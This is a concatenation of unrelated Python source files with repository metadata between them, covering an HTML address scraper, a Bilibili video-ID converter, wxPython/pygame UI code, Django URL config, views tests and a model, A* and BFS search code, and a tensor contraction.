def __init__(self,block):
self.block=block
def __str__(self):
title,person=self.header()
return title
def header(self):
title,person=self.block.xpath('preceding-sibling::strong[position()<=2]/text()')
return title,person
def region(self):
return self.block.xpath('preceding-sibling::div[div[@class="darker"]]/div/h3/text()')[-1]
def branch_names(self):
return self.block.xpath('descendant::strong/text()')
def data(self):
title,person=self.header()
return {
"blockName":title
, "blockPerson":person
, "region":self.region()
}
def branches(self):
b=[]
for branch_name in self.branch_names():
nodes=self.block.xpath('descendant::p[strong/text()="%s"]'%branch_name)
assert len(nodes)==1
b.append(Branch(nodes[0]))
return b
class Branch:
def __init__(self,p):
self.p=p
def __str__(self):
return self.name()
def name(self):
nodes=self.p.xpath('strong/text()')
assert 1==len(nodes)
return nodes[0]
def address(self):
return '\n'.join(self.p.xpath('text()'))
def phonecount(self):
return len(self.b_text())
def address_sans_phone(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()])
def postcode(self):
return self.p.xpath('text()')[-self.phonecount()-1]
def town(self):
return self.p.xpath('text()')[-self.phonecount()-2]
def street_address(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()-2])
def b_text(self):
return self.p.xpath('b/text()')
def phones(self):
numbers=self.p.xpath('text()')[-self.phonecount():]
return zip(self.b_text(),numbers)
def data(self):
d=dict([ (keyify(phone[0]),phone[1]) for phone in self.phones() ])
d.update({
"branchName":self.name()
, "address_raw":self.address()
, "town":strip_address(self.town())
, "address":strip_address(self.address_sans_phone())
, "street-address":strip_address(self.street_address())
, "postcode":strip_address(self.postcode())
})
return d
main()
|
[
"pallih@kaninka.net"
] |
pallih@kaninka.net
|
04e72e6c7258fd53dbcd5d95b249789f8fd864f3
|
c5b738612c1ecbce0583a327032db1e6c339de0b
|
/bv-av互转工具/bv_av.py
|
f9638358b8b57e57698495513ae8afc32d628271
|
[
"BSD-2-Clause"
] |
permissive
|
helloworldSB/Gear-s-toolBox-archive
|
c766d27e45a9eb9a99dfa360ac68a0ac1c93d8c7
|
40bc05cbb0060ecc3d9f941276c9caccbe1b8d82
|
refs/heads/master
| 2023-01-01T00:38:31.211587
| 2020-10-16T12:43:25
| 2020-10-16T12:43:25
| 306,789,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,831
|
py
|
class av_bv_cls:
def __init__(self):
self.table='fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'
self.tr={}
for i in range(58):
self.tr[self.table[i]]=i
self.s=[11,10,3,8,4,6]
self.xor=177451812
self.add=8728348608
def dec(self,x):
r=0
for i in range(6):
r+=self.tr[x[self.s[i]]]*58**i
return (r-self.add)^self.xor
def enc(self,x):
x=(x^self.xor)+self.add
r=list('BV1 4 1 7 ')
for i in range(6):
r[self.s[i]]=self.table[x//58**i%58]
return ''.join(r)
from urllib import request,parse
from json import loads#,dumps
while True:
ctrl_num = input(r'''
您希望采用哪种API?(输入数字)
1.官方API 2.离线算法
按 CTRL+C 结束
''')
if ctrl_num == '1' or ctrl_num == '2':
video_num = input('''
请输入视频号
记得带上av或BV前缀
''')
if video_num[:2] == 'av' or video_num[:2] == 'AV':flag = False
elif video_num[:2] == 'BV' or video_num[:2] == 'bv':flag = True
if ctrl_num == '1':
URL = r'http://api.bilibili.com/x/web-interface/archive/stat?'
if flag:URL += r'bvid='
else:URL += r'aid='
URL += video_num[2:]
req = request.Request(URL)
req.add_header("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36")
with request.urlopen(req) as f:
temp1 = f.read()
temp1 = loads(temp1)
if temp1['code'] != 0:
print('转换错误!错误代码:',temp1['code'],'错误值:',temp1['message'])
continue
print('\n转换成功!')
temp2 = temp1['data']
print('av号:',temp2['aid'])
print('bv号:',temp2['bvid'])
print('投币数:',temp2['coin'])
print('共被浏览过',temp2['view'],'次')
print('共有',temp2['reply'],'个评论')
print('点赞数:',temp2['like'])
print('收藏数:',temp2['favorite'])
print('分享数:',temp2['share'])
print(r'授权方式(1代表原创,2代表搬运):',temp2['copyright'])
print(r'历史排名:',temp2['his_rank'])
print(r'白嫖数:',temp2['view'] - temp2['coin'] - temp2['like'] - temp2['favorite'])
print('\n',r'注:白嫖数=观看数-投币人数-点赞人数-收藏人数')
elif ctrl_num == '2':
if flag:print('av号:av',av_bv_cls().dec(video_num),sep='')
else:print('bv号:',av_bv_cls().enc(int(video_num[2:])))
|
[
"noreply@gitee.com"
] |
noreply@gitee.com
|
c3c32b313e00e643cc818413d71b1bfdc3db915c
|
eee3a183136bdebed599249604b63f0b0f02ba71
|
/pyrates/ui.py
|
095ed9079bf11379368972be213dff233665f534
|
[] |
no_license
|
gutomaia/pyrates
|
3971d332a0977a8d130c0836e86c3368a8531a8b
|
a81ef57c368e1341a0e09b548a94f27801f89546
|
refs/heads/master
| 2021-06-29T12:53:56.033594
| 2017-09-20T19:00:45
| 2017-09-20T19:00:45
| 104,124,622
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,567
|
py
|
import wx, sys, os, pygame
### PYGAME IN WX ###
# A simple test of embedding Pygame in a wxPython frame
#
# By David Barker (aka Animatinator), 14/07/2010
# Patch for cross-platform support by Sean McKean, 16/07/2010
# Patch to fix redrawing issue by David Barker, 20/07/2010
# Second window demo added by David Barker, 21/07/2010
class PygameDisplay(wx.Window):
def __init__(self, parent, ID):
wx.Window.__init__(self, parent, ID)
self.parent = parent
self.hwnd = self.GetHandle()
self.size = self.GetSizeTuple()
self.size_dirty = True
self.timer = wx.Timer(self)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.Update, self.timer)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.fps = 60.0
self.timespacing = 1000.0 / self.fps
self.timer.Start(self.timespacing, False)
self.linespacing = 5
def Update(self, event):
self.Redraw()
def Redraw(self):
if self.size_dirty:
self.screen = pygame.Surface(self.size, 0, 32)
self.size_dirty = False
self.pygame_redraw(self.timer.GetInterval())
s = pygame.image.tostring(self.screen, 'RGB') # Convert the surface to an RGB string
img = wx.ImageFromData(self.size[0], self.size[1], s) # Load this string into a wx image
bmp = wx.BitmapFromImage(img) # Get the image in bitmap form
dc = wx.ClientDC(self) # Device context for drawing the bitmap
dc.DrawBitmap(bmp, 0, 0, False) # Blit the bitmap image to the display
del dc
def pygame_redraw(self, deltaTime):
self.screen.fill((0,0,0))
cur = 0
w, h = self.screen.get_size()
while cur <= h:
pygame.draw.aaline(self.screen, (255, 255, 255), (0, h - cur), (cur, 0))
cur += self.linespacing
def OnPaint(self, event):
self.Redraw()
event.Skip() # Make sure the parent frame gets told to redraw as well
def OnSize(self, event):
self.size = self.GetSizeTuple()
self.size_dirty = True
def Kill(self, event):
# Make sure Pygame can't be asked to redraw /before/ quitting by unbinding all methods which
# call the Redraw() method
# (Otherwise wx seems to call Draw between quitting Pygame and destroying the frame)
# This may or may not be necessary now that Pygame is just drawing to surfaces
self.Unbind(event = wx.EVT_PAINT, handler = self.OnPaint)
self.Unbind(event = wx.EVT_TIMER, handler = self.Update, source = self.timer)
ID_ABOUT = 12753
class Frame(wx.Frame):
def init_menubar(self):
self.menubar = wx.MenuBar()
fileMenu = wx.Menu()
newitem = wx.MenuItem(fileMenu, wx.ID_NEW, text='New', kind = wx.ITEM_NORMAL)
fileMenu.AppendItem(newitem)
fileMenu.AppendSeparator()
quit = wx.MenuItem(fileMenu, wx.ID_EXIT, '&Quit\tCtrl+Q')
fileMenu.AppendItem(quit)
helpMenu = wx.Menu()
aboutItem = wx.MenuItem(helpMenu, ID_ABOUT, text='About', kind = wx.ITEM_NORMAL)
helpMenu.AppendItem(aboutItem)
self.menubar.Append(fileMenu, '&File')
self.menubar.Append(helpMenu, '&Help')
self.SetMenuBar(self.menubar)
self.Bind(wx.EVT_MENU, self.menuhandler)
def menuhandler(self, event):
menu_id = event.GetId()
if menu_id == wx.ID_EXIT:
self.Kill(event)
def init_toolbar(self):
# self.toolbar = self.CreateToolBar(wx.TB_TEXT, wx.TB_NOICONS, -1)
self.toolbar = self.CreateToolBar()
run = self.toolbar.AddLabelTool(wx.ID_ANY, 'Run', wx.Bitmap('assets/icons/run.png'))
self.Bind(wx.EVT_TOOL, self.run_command, run)
self.toolbar.Realize()
def run_command(self, event):
source = self.editor.GetText()
self.display.active_scene.input_code(source)
def init_statusbar(self):
self.statusbar = self.CreateStatusBar()
self.statusbar.SetFieldsCount(3)
self.statusbar.SetStatusWidths([-3, -4, -2])
self.statusbar.SetStatusText("pyRATES", 0)
self.statusbar.SetStatusText("Look, it's a nifty status bar!!!", 1)
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, size = (600, 600))
self.SetTitle("Pyrates")
self.init_menubar()
self.init_toolbar()
self.init_statusbar()
from gameengine import DisplayScene
self.display = DisplayScene(self, -1)
# self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_CLOSE, self.Kill)
self.curframe = 0
self.timer = wx.Timer(self)
# self.Bind(wx.EVT_SCROLL, self.OnScroll)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_TIMER, self.Update, self.timer)
self.timer.Start((1000.0 / self.display.fps))
from editor import SourceEditor
self.editor = SourceEditor(self)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.display, 1, flag = wx.EXPAND)
self.sizer.Add(self.editor, 1, flag = wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.Layout()
def Kill(self, event):
self.display.Kill(event)
self.Destroy()
def OnSize(self, event):
self.Layout()
def Update(self, event):
pass
# self.statusbar.SetStatusText("Frame %i" % self.curframe, 2)
def OnScroll(self, event):
self.display.linespacing = self.slider.GetValue()
|
[
"guto@guto.net"
] |
guto@guto.net
|
5279d2be8c763659dcb6380332b42896fbc7aadf
|
ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f
|
/P.O.R.-master/pirates/band/BandConstance.py
|
3084b1fafdd7057904fb44feb8192cad6b7ec899
|
[] |
no_license
|
BrandonAlex/Pirates-Online-Retribution
|
7f881a64ec74e595aaf62e78a39375d2d51f4d2e
|
980b7448f798e255eecfb6bd2ebb67b299b27dd7
|
refs/heads/master
| 2020-04-02T14:22:28.626453
| 2018-10-24T15:33:17
| 2018-10-24T15:33:17
| 154,521,816
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
outcome_ok = 0
outcome_declined = 9
outcome_not_online = 10
outcome_already_invited = 11
outcome_already_in_Band = 12
outcome_full = 13
outcome_recently_invited = 14
MAX_BAND_MEMBERS = 12
BandMakeEvent = 'BandMakeEvent'
BandAddEvent = 'BandAddEvent'
BandSetCaptainEvent = 'BandSetCaptainEvent'
BandRemoveEvent = 'BandRemoveEvent'
BandOnlineEvent = 'BandOnlineEvent'
BandOfflineEvent = 'BandOfflineEvent'
BandDetailsEvent = 'BandDetailsEvent'
BandRejectInviteEvent = 'BandRejectInviteEvent'
BandRetractInviteEvent = 'BandRetractInviteEvent'
BandInvitationEvent = 'BandInvitationEvent'
BandInvitationResponceEvent = 'BandIinvitationResponce'
BandRejoinEvent = 'BandRejoinEvent'
BandMemberNameChange = 'BandMemberNameChange'
BandMemberHpChange = 'BandMemberHpChange'
BandMemberMaxHpChange = 'BandMemberMaxHpChange'
BandMemberShipChange = 'BandMemberShipChange'
BandMemberSinceChange = 'BandMemberSinceChange'
BandMemberOnlineChange = 'BandMemberOnlineChange'
BandMemberPVPChange = 'BandMemberPVPChange'
BandMemberParlorChange = 'BandMemberParlorChange'
BandMemberStatusChange = 'BandMemberStatusChange'
BandMemberManagerChange = 'BandMemberManagerChange'
BandMemberNameChange = 'BandMemberNameChange'
BandMembershipChange = 'BandMembershipChange'
|
[
"brandoncarden12345@gmail.com"
] |
brandoncarden12345@gmail.com
|
c85814fada2df5966221b0945bc1ba5ac1480924
|
095521582f598b65b76f222d8c1acbcaca0c24bf
|
/output_raw/output_input_Lx1Ly1.py
|
6fc5163f524ebec0cbe9a033d06a5b0d688ee15f
|
[
"MIT"
] |
permissive
|
ryuikaneko/itps_contraction
|
cf07e41d32e93c10db6ebeb1c4f5246b238e737b
|
10816fb6c90d77f5a3b2f804ab22573d1d676eb4
|
refs/heads/master
| 2020-08-28T23:05:00.262183
| 2020-08-03T01:04:22
| 2020-08-03T01:04:22
| 217,847,703
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
def Contract_scalar_1x1(\
t0_2,t1_2,t2_2,\
t0_1,t1_1,t2_1,\
t0_0,t1_0,t2_0,\
o1_1\
):
##############################
# ./input/input_Lx1Ly1.dat
##############################
# (o1_1*(t1_1.conj()*((t2_1*(t2_0*t1_0))*(t1_1*((t0_0*t0_1)*(t0_2*(t2_2*t1_2)))))))
# cpu_cost= 6.04e+10 memory= 4.0004e+08
# final_bond_order ()
##############################
return np.tensordot(
o1_1, np.tensordot(
t1_1.conj(), np.tensordot(
np.tensordot(
t2_1, np.tensordot(
t2_0, t1_0, ([1], [0])
), ([1], [0])
), np.tensordot(
t1_1, np.tensordot(
np.tensordot(
t0_0, t0_1, ([1], [0])
), np.tensordot(
t0_2, np.tensordot(
t2_2, t1_2, ([0], [1])
), ([1], [1])
), ([1], [0])
), ([0, 1], [1, 4])
), ([0, 1, 3, 4], [5, 0, 3, 1])
), ([0, 1, 2, 3], [3, 4, 0, 1])
), ([0, 1], [1, 0])
)
|
[
"27846552+ryuikaneko@users.noreply.github.com"
] |
27846552+ryuikaneko@users.noreply.github.com
|
86f698f7d8d5c7cfd608eaafe79d63a8b0eb18e9
|
4111ca5a73a22174f189361bef654c3f91c3b7ed
|
/Lintcode/Ladder_all_A_OA/1563. Shortest path to the destination.py
|
48bee8bb3ef8e656816609bf09cf2f8d0f824c98
|
[
"MIT"
] |
permissive
|
ctc316/algorithm-python
|
58b541b654509ecf4e9eb8deebfcbdf785699cc4
|
ac4580d55e05e93e407c6156c9bb801808027d60
|
refs/heads/master
| 2020-03-16T06:09:50.130146
| 2019-08-02T02:50:49
| 2019-08-02T02:50:49
| 132,548,222
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 937
|
py
|
class Solution:
"""
@param targetMap:
@return: nothing
"""
def shortestPath(self, targetMap):
n = len(targetMap)
m = len(targetMap[0])
from queue import Queue
q = Queue()
q.put((0, 0))
visited = [[False for _ in range(m)] for __ in range(n)]
visited[0][0] = True
steps = -1
while not q.empty():
steps += 1
for _ in range(q.qsize()):
x, y = q.get()
if targetMap[x][y] == 2:
return steps
for move in [[0, 1], [1, 0], [-1, 0], [0, -1]]:
x_ = x + move[0]
y_ = y + move[1]
if x_ < 0 or x_ >= n or y_ < 0 or y_ >= m or targetMap[x_][y_] == 1 or visited[x_][y_]:
continue
q.put((x_, y_))
visited[x_][y_] = True
return -1
|
[
"mike.tc.chen101@gmail.com"
] |
mike.tc.chen101@gmail.com
|
ee81b899c6541035f84172ed6bdc9122b5c2ad05
|
58ca1aedfd2c2c43ce3f71e7877f92c51d41adf8
|
/filter_boost.py
|
7eb7dd7c85ddbaf8c0158ea3ec0773068f690eb8
|
[] |
no_license
|
seaun163/DeepSLAM
|
00d88ee00367987cb4b7a57db3b0bedafeeb4e68
|
a038772bd7de897fb8253214813bfab09e31d62f
|
refs/heads/master
| 2021-01-25T08:19:28.198277
| 2016-10-18T19:11:32
| 2016-10-18T19:11:32
| 93,752,917
| 1
| 0
| null | 2017-06-08T13:32:24
| 2017-06-08T13:32:24
| null |
UTF-8
|
Python
| false
| false
| 4,391
|
py
|
import numpy as np
import h5py
import scipy.sparse
import scipy.io
from constants import *
import ipdb
import os
import pickle
# frame length, which also dictates the delay being frame capture and feedback
# because of forward_fit
# which isn't even in the report...
flen = DEE
flen_2 = 3
dt = EPSILON
st = 0.75 #kind of equivalent to sigma
"""
import sys
from IPython.core import ultratb
sys.excepthook = ultratb.FormattedTB(mode='Verbose',
color_scheme='Linux', call_pdb=1)
"""
res_dict = {}
ground_truth = scipy.io.loadmat('GroundTruth_Eynsham_40meters.mat')['ground_truth']
for fname in os.listdir("good"):
### Get matches from confusion matrix ###
# load the confusion matrix
dname = "dataset"
print("opening file %s" %fname)
h5f = h5py.File("good/"+fname, 'r')
conf_matrix = h5f[dname][:]
h5f.close()
print("procesing layer")
# grab the testing matrix from the confusion matrix
test_matrix = conf_matrix[0:4789, 4789:9575]
# the min score is the best match
b = np.argmin(test_matrix, axis=0)
# Percentage of top matches used in the vibration calculation, allows the occasional outlier
inlier_fraction = 5/6.0
matches = np.zeros(int(b.size - flen + flen_2))
stable_count = 0
# WHY NOT FILTER AROUND? Change to get same results but neater?
for i in range(0, b.size - flen):
match_index = int(i + flen_2)
# Check that the match being considered is continous with those around it
vibrations = np.abs( np.diff(b[i:i + flen]) )
sorted_vib = np.sort(vibrations)
max_diff = np.max(sorted_vib[ 0 : int(np.round(inlier_fraction * flen)) ])
stable = max_diff <= dt
# linear regression to get slope of fit
pt = np.polyfit( np.arange(0, flen), b[i:i + flen], 1)
# This is the slope, because highest powers first
velocity = pt[0]
# forward match with a tolerance of -1 and +1
# absolute value to check going forwards or backwards
forward_match = np.abs(velocity - 1) < st or np.abs(velocity + 1) < st
if stable and forward_match:
# smooth the value based off of those around it
matches[match_index] = pt[1] + pt[0] * 0.5 * flen
for j in range(1, flen_2 + 1):
back_chk = match_index - j
front_chk = match_index + j
# fill in the zero (default) values if possible
if matches[back_chk] == 0:
matches[back_chk] = b[back_chk]
# fill in base values for future vals
if front_chk < 4783:
matches[front_chk] = b[front_chk]
### Compare to ground truth ###
print("zeros")
print(np.where(matches == 0)[0].size)
print("comparing to ground truth")
start_first = 1
end_first = 4788
len_first = end_first - start_first + 1
start_second = 4789
end_second = 9574
len_second = end_second - start_second + 1
half_matrix = 4785
ground_matrix = np.zeros((len_second, len_first))
tp_num = 0
tp_value = []
fp_num = 0
fp_value = []
for ground_idx in range(start_second, end_second):
value_ground = ground_truth[ground_idx, :]
value_fit = value_ground.toarray().flatten().nonzero()[0]
# only store those in first round
value_fit2 = value_fit[ np.where(value_fit < end_first)[0].astype(int) ]
value_fit3 = value_fit2 - start_first + 1
value_fit4 = value_fit3[ np.where(value_fit3 > 0)[0].astype(int) ]
matrix_idx = ground_idx - start_second + 1
ground_matrix[matrix_idx, value_fit4] = 1
for truth_idx in range(0, matches.size):
ground_row = ground_truth[truth_idx+end_first, :]
ground_row_idx = ground_row.toarray().flatten().nonzero()[0]
if matches[truth_idx] != 0:
truth_va = np.round(matches[truth_idx])
if np.any(ground_row_idx == np.round(truth_va)):
tp_num = tp_num + 1
tp_value = [tp_value, truth_idx]
else:
fp_num = fp_num + 1
fp_value = [fp_value, truth_idx]
precision = tp_num / float(tp_num + fp_num)
print(precision)
recall = tp_num / float(b.size)
print(recall)
res_dict[fname] = (precision, recall)
pickle.dump(res_dict, open("filter_res.p", "wb"))
|
[
"saubin@uwaterloo.ca"
] |
saubin@uwaterloo.ca
|
9358246c129bb1d8b1e564a81ba419196d73a04a
|
30f6633a24d799fddd51672c528e4baee649d8cd
|
/6.01/designLab09/simulator/core/search/search.py
|
11d2ff11f60cd14eada34c78bd6c767fc197f676
|
[] |
no_license
|
Rajpratik71/mit-courses
|
e12c864435a1af2c8b7034af956fd2f53d559cfc
|
86a06a3192e17230a05c5c7beeed5699df73be22
|
refs/heads/master
| 2023-06-22T21:05:37.240985
| 2023-01-26T06:44:49
| 2023-01-26T06:44:49
| 192,182,074
| 0
| 2
| null | 2023-04-05T04:00:47
| 2019-06-16T11:15:24
|
TeX
|
UTF-8
|
Python
| false
| false
| 3,299
|
py
|
"""
Search infrastructure.
Credit to Chapter 7 of MIT 6.01 notes
(http://mit.edu/6.01/www/handouts/readings.pdf).
"""
__author__ = 'mikemeko@mit.edu (Michael Mekonnen)'
from constants import PRINT_FAIL_REASON
from core.data_structures.priority_queue import Priority_Queue
class Search_Node:
"""
Representation for a node in the search graph. Clients of the search
infrastructure should use subclasses of Search_Node implementing the
get_children method.
"""
def __init__(self, state, parent=None, cost=0):
"""
|state|: state of the search node, dependent on the application.
|parent|: parent node to this node, None if this node is the root.
|cost|: cost to reach from the root node to this node.
"""
self.state = state
self.parent = parent
self.cost = cost
def get_children(self):
"""
Should return a list of the Search_Nodes that are reachable from this node.
"""
raise NotImplementedError('subclasses should implement this')
def get_path(self):
"""
Returns a list of the states of the nodes from the root to this node.
"""
path = []
current = self
while current is not None:
path = [current.state] + path
current = current.parent
return path
def a_star(start_node, goal_test, heuristic=lambda state: 0, best_first=False,
           progress=lambda state, cost: None, max_states_to_expand=None, verbose=True):
    """
    Runs an A* search starting at |start_node| until a node that satisfies the
    |goal_test| is found. |goal_test| should be a function that takes in a
    state of a node and returns True if the desired goal has been satisfied.
    |heuristic| is a map from node states to estimates of distance to the
    goal, should be admissible to produce optimal value, and can result in
    considerable speed-up! (See Chapter 7 of MIT 6.01 course notes for more.)
    Returns the node whose state satisfies the |goal_test|, or None if no such
    node is found. Also returns the total number of nodes expanded.
    For progress checks, every time a node is popped out of the priority queue,
    this method calls |progress| with the state and cost of the node that
    was just popped.
    So that a search problem does not take too long without success, may give a
    |max_states_to_expand| after which the search stops and returns None.
    Note: with best_first=True the accumulated cost term is zeroed out, so the
    queue is ordered by the heuristic alone (greedy best-first search).
    """
    # Fast path: the start node may already satisfy the goal.
    if goal_test(start_node.state):
        return start_node, 0
    agenda = Priority_Queue()
    # Priority is cost-so-far + heuristic (A*), or heuristic alone (best-first).
    agenda.push(start_node, (not best_first) * start_node.cost +
                heuristic(start_node.state))
    expanded = set()
    while agenda:
        parent, cost = agenda.pop()
        progress(parent.state, cost)
        # Skip states already expanded (the cheaper copy was handled first).
        if parent.state not in expanded:
            if goal_test(parent.state):
                return parent, len(expanded)
            expanded.add(parent.state)
            for child in parent.get_children():
                if child.state not in expanded:
                    agenda.push(child, (not best_first) * child.cost +
                                heuristic(child.state))
        # Give up once the expansion budget is exhausted.
        if max_states_to_expand and len(expanded) > max_states_to_expand:
            if PRINT_FAIL_REASON:
                if verbose:
                    print 'exceeded number of states to expand'
            return None, len(expanded)
    # Agenda drained without reaching a goal state.
    if PRINT_FAIL_REASON:
        if verbose:
            print 'exhausted search space'
    return None, len(expanded)
|
[
"wangjohn@mit.edu"
] |
wangjohn@mit.edu
|
70be3975013551c5c951c1f9da8444e2c6273397
|
9eb48a3b8d5b1127012579a818ad349d21df2414
|
/Django2.6/djusers2/djusers2/urls.py
|
cb92ccbd44dd9b5cf5eef70172579be1432e0fdf
|
[] |
no_license
|
rahulsayon/Django1-to-Django-1.8
|
b864deb46529c29a6cd424e3c9f1e99baa8942af
|
2f4ae9343b631ff53caa50c8a822c7b4718c5512
|
refs/heads/master
| 2022-12-11T17:02:24.183982
| 2020-09-06T15:31:02
| 2020-09-06T15:31:02
| 293,305,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,026
|
py
|
"""djusers2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from accounts.views import register , user_login ,user_logout, activate_user_view
urlpatterns = [
    path('admin/', admin.site.urls),
    path('register/', register),
    path('login/', user_login),
    # BUG FIX: 'logout/' was registered twice; Django's resolver uses the
    # first match, so the second identical entry was dead configuration.
    path('logout/', user_logout),
    path('activate/<slug:code>', activate_user_view),
]
|
[
"rahulsayon95@gmail.com"
] |
rahulsayon95@gmail.com
|
808034c7ccf8082a00e739cd27d0b9f1e4d28040
|
c4af06a090818ea05b3e6c11866406b4a5d3378a
|
/diary/tests/test_views.py
|
d75d629eb6e2caf9d9a6ef65d1557b70f5eb02f1
|
[] |
no_license
|
shige-horiuchi/private_diary
|
c88adff27bf4208ca7451bff841e5f300ac64d0a
|
e8b3cb63129c73d6c98f530ef543c19b02a5e79c
|
refs/heads/master
| 2021-01-03T19:03:29.599143
| 2020-02-21T06:51:37
| 2020-02-21T06:51:37
| 240,201,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,717
|
py
|
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse_lazy
from ..models import Diary
class LoggedInTestCase(TestCase):
    """Custom TestCase base class holding the setup shared by the test classes below."""

    def setUp(self):
        """Create a test user and log the test client in before each test method."""
        # Password for the test user.
        self.password = '<ログインパスワード>'
        # Create the user used by each test method and keep it
        # on the instance for later access.
        self.test_user = get_user_model().objects.create_user(
            username='<ログインユーザー名>',
            email='<ログインユーザーのメールアドレス>',
            password=self.password)
        # Log the test client in as that user.
        self.client.login(email=self.test_user.email, password=self.password)
class TestDiaryCreateView(LoggedInTestCase):
    """Tests for DiaryCreateView."""

    def test_create_diary_success(self):
        """Verify that creating a diary entry succeeds."""
        # POST parameters.
        params = {'title': 'テストタイトル',
                  'content': '本文',
                  'photo1': '',
                  'photo2': '',
                  'photo3': ''}
        # Execute the create view (POST).
        response = self.client.post(reverse_lazy('diary:diary_create'), params)
        # Verify the redirect to the diary list page.
        self.assertRedirects(response, reverse_lazy('diary:diary_list'))
        # Verify the diary entry was stored in the DB.
        self.assertEqual(Diary.objects.filter(title='テストタイトル').count(), 1)

    def test_create_diary_failure(self):
        """Verify that creating a diary entry fails when required fields are missing."""
        # Execute the create view (POST) with no parameters.
        response = self.client.post(reverse_lazy('diary:diary_create'))
        # Verify the required-field validation error is reported on the form.
        self.assertFormError(response, 'form', 'title', 'このフィールドは必須です。')
class TestDiaryUpdateView(LoggedInTestCase):
    """Tests for DiaryUpdateView."""

    def test_update_diary_success(self):
        """Verify that editing a diary entry succeeds."""
        # Create a diary entry to edit.
        diary = Diary.objects.create(user=self.test_user, title='タイトル編集前')
        # POST parameters.
        params = {'title': 'タイトル編集後'}
        # Execute the update view (POST).
        response = self.client.post(reverse_lazy('diary:diary_update', kwargs={'pk': diary.pk}), params)
        # Verify the redirect to the diary detail page.
        self.assertRedirects(response, reverse_lazy('diary:diary_detail', kwargs={'pk': diary.pk}))
        # Verify the diary entry was updated in the DB.
        self.assertEqual(Diary.objects.get(pk=diary.pk).title, 'タイトル編集後')

    def test_update_diary_failure(self):
        """Verify that editing a nonexistent diary entry fails."""
        # Execute the update view (POST) against a missing primary key.
        response = self.client.post(reverse_lazy('diary:diary_update', kwargs={'pk': 999}))
        # Verify that editing a nonexistent entry returns 404.
        self.assertEqual(response.status_code, 404)
class TestDiaryDeleteView(LoggedInTestCase):
    """Tests for DiaryDeleteView."""

    def test_delete_diary_success(self):
        """Verify that deleting a diary entry succeeds."""
        # Create a diary entry to delete.
        diary = Diary.objects.create(user=self.test_user, title='タイトル')
        # Execute the delete view (POST).
        response = self.client.post(reverse_lazy('diary:diary_delete', kwargs={'pk': diary.pk}))
        # Verify the redirect to the diary list page.
        self.assertRedirects(response, reverse_lazy('diary:diary_list'))
        # Verify the diary entry was removed from the DB.
        self.assertEqual(Diary.objects.filter(pk=diary.pk).count(), 0)

    def test_delete_diary_failure(self):
        """Verify that deleting a nonexistent diary entry fails."""
        # Execute the delete view (POST) against a missing primary key.
        response = self.client.post(reverse_lazy('diary:diary_delete', kwargs={'pk': 999}))
        # Verify that deleting a nonexistent entry returns 404.
        self.assertEqual(response.status_code, 404)
|
[
"shige33717@gmail.com"
] |
shige33717@gmail.com
|
2210cba8d3da1e4a07b474131e7a1c9266cffc5a
|
35522da66f15ee51a251b008b39d3457e70cf7de
|
/web/nut/models/NUTInput.py
|
cc23dbe18e3c2bb3285d3337197789cb5d7fa33c
|
[] |
no_license
|
yeleman/nut
|
34d74e72d137903285f3938f3165cefb45afb7ea
|
5e68ae23df6c4d77a055dfbe85ae37a9fcdc4cd0
|
refs/heads/master
| 2016-09-06T03:19:55.898651
| 2012-02-06T18:30:25
| 2012-02-06T18:30:25
| 2,733,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
#!/usr/bin/env python
# encoding=utf_8
# maintainer: rgaudin
from django.db import models
from django.utils.translation import ugettext_lazy as _, ugettext
class NUTInput(models.Model):
    """ Input item identified by a slug primary key with a display name. """

    class Meta:
        app_label = 'nut'
        verbose_name = _(u"Input")
        verbose_name_plural = _(u"Inputs")

    # Human-readable name of the input.
    name = models.CharField(_(u"Name"), max_length=50)
    # Short identifier; doubles as the primary key.
    slug = models.SlugField(_(u"Slug"), max_length=15, primary_key=True)

    def __unicode__(self):
        # Python 2 string representation (this codebase targets Python 2).
        return self.name
|
[
"rgaudin@gmail.com"
] |
rgaudin@gmail.com
|
8d48f45e0e6026af661aef287d578466e41d8245
|
d22db204c665d16847447551cedc07756d357eb2
|
/hydrus/client/gui/ClientGUICore.py
|
11dfa96ae748ebcb4c2a0789eebcbcacc9172d7b
|
[
"WTFPL"
] |
permissive
|
Suika/hydrus
|
9d5070d47c328b7054a9699de310ce580e563528
|
4b2b15e152e4bed900aa972c7d4b27f7bf242f29
|
refs/heads/master
| 2023-05-28T00:32:50.364999
| 2023-05-10T20:22:34
| 2023-05-10T20:22:34
| 237,063,790
| 1
| 2
|
NOASSERTION
| 2022-10-29T22:36:54
| 2020-01-29T19:23:21
|
Python
|
UTF-8
|
Python
| false
| false
| 2,153
|
py
|
from qtpy import QtCore as QC
